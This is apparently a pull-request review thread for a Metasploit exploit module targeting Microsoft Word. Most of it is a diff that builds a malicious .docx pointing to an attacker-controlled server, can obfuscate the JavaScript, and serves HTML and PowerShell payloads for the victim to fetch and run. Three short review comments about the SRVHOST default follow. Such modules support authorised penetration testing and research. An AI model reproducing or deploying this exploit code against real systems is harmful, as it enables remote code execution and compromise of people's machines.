modules/exploits/windows/fileformat/word_msdtjs_rce.rb

```diff
@@ -0,0 +1,219 @@
+    if datastore['OBFUSCATE']
+      print_status('Obfuscate JavaScript content')
+
+      js_content = Rex::Exploitation::JSObfu.new js_content
+      js_content = js_content.obfuscate(memory_sensitive: false)
+    end
+
+    html = '<!DOCTYPE html><html><head><meta http-equiv="Expires" content="-1"><meta http-equiv="X-UA-Compatible" content="IE=11"></head><body><script>'
+    html += "\n#{dummy}\n#{js_content}\n"
+    html += '</script></body></html>'
+
+    html
+  end
+
+  def inject_docx
+    document_xml = get_file_in_docx('word/document.xml')
+    unless document_xml
+      fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml')
+    end
+
+    document_xml_rels = get_file_in_docx('word/_rels/document.xml.rels')
+    unless document_xml_rels
+      fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')
+    end
+
+    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"
+    @docx.each do |entry|
+      case entry[:fname]
+      when 'word/_rels/document.xml.rels'
+        entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', "#{uri}!")
+      end
+    end
+  end
+
+  def normalize_uri(*strs)
+    new_str = strs * '/'
+
+    new_str = new_str.gsub!('//', '/') while new_str.index('//')
+
+    # makes sure there's a starting slash
+    unless new_str[0, 1] == '/'
+      new_str = '/' + new_str
+    end
+
+    new_str
+  end
+
+  def on_request_uri(cli, request)
+    header_html = {
+      'Access-Control-Allow-Origin' => '*',
+      'Access-Control-Allow-Methods' => 'GET, POST',
+      'Cache-Control' => 'no-store, no-cache, must-revalidate',
+      'Content-Type' => 'text/html; charset=UTF-8'
+    }
+
+    if request.method.eql? 'HEAD'
+      send_response(cli, '', header_html)
+    elsif request.method.eql? 'OPTIONS'
+      response = create_response(501, 'Unsupported Method')
+      response['Content-Type'] = 'text/html'
+      response.body = ''
+
+      cli.send_response(response)
+    elsif request.raw_uri.to_s.end_with? '.html'
+      print_status('Sending HTML Payload')
+
+      send_response_html(cli, generate_html, header_html)
+    elsif request.raw_uri.to_s.end_with? '.ps1'
+      print_status('Sending PowerShell Payload')
+
+      send_response(cli, @payload_data, header_html)
+    end
+  end
+
+  def pack_docx
+    @docx.each do |entry|
+      if entry[:data].is_a?(Nokogiri::XML::Document)
+        entry[:data] = entry[:data].to_s
+      end
+    end
+
+    Msf::Util::EXE.to_zip(@docx)
+  end
+
+  def primer
+    print_status('Generate a malicious docx file')
+
+    @proto = (datastore['SSL'] ? 'https' : 'http')
+    if datastore['SRVHOST'] == '0.0.0.0'
+      datastore['SRVHOST'] = Rex::Socket.source_address('1.2.3.4')
```

Comment:
If you set the `SRVHOST` default value to `Rex::Socket.source_address`, it'll be more clear to the user. Doing it this way would bind to a different address than what the user had set (`0.0.0.0`) and they may not be aware that it needs to be a routable address so the target can connect to them.

Reply:
I'm not completely familiar with `Rex::Socket.source_address`. I used a functional example. Can you help me more?

Reply:
Hahaha, I'm so stupid, I just understanded where you were going with this :)

Fixed in the next commit :)